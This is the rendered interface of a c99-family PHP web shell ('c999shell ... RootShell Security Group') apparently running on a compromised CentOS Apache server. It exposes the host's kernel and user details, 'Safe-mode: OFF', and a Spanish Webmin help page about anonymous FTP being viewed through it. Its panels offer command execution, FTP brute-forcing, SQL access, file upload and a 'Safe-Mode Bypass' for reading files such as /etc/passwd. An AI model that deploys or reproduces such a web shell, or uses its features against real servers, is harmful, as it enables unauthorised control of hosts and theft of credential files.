!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/wuftpd/help/   drwxr-xr-x
Free 50.88 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     anon.es.html (1.92 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
FTP Anónimo
La primera tabla de esta página te permite especificar el directorio al que el servidor cambiará cuando un usuario anónimo haga login. Se puede seleccionar un directorio diferente dependiendo de las clases de usuario o se puede utilizar un solo directorio para todas las clases. Si no se especifica ningún directorio, el servidor FTP cambiará al directorio inicial del usuario ftp.

A causa de que el servidor llama a programas externos como ls y tar, el directorio anónimo raíz debe de contener un directorio bin con esos programas, un directorio lib que contenga cualquier biblioteca compartida que haga falta y un directorio etc que contenga los archivos passwd y group. Cuando un servidor utiliza chroot para limitar el acceso al directorio anónimo raíz, no puede acceder a ningún programa fuera de ese directorio.

La segunda tabla controla a qué directorio el servidor hará chroot cuando los usuarios sean invitados. Para cada directorio se puede especificar a qué usuarios se aplicará; para ello sólo debes de digitar sus nombres, UIDs (como %3000) o rangos de UID (como %3000-3006). Si no se digitan usuarios, el directorio se utiliza para todos los usuarios invitados.

La tercera tabla te permite controlar como qué grupo de Unix los usuarios anónimos de FTP serán tratados, en vez del grupo primario del usuario ftp. Para cada grupo digitado puedes seleccionar una o más clases de usuario; por ejemplo para garantizar el acceso a ciertos archivos por parte de usuarios anónimos de ciertas direcciones IP.

Finalmente, la sección inferior de la página contiene entradas para controlar qué claves de acceso son aceptables para los logins anónimos de FTP. Tradicionalmente, los usuarios FTP deberían de enviar una dirección de correo válida como su clave de acceso para login anónimo.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0659 ]--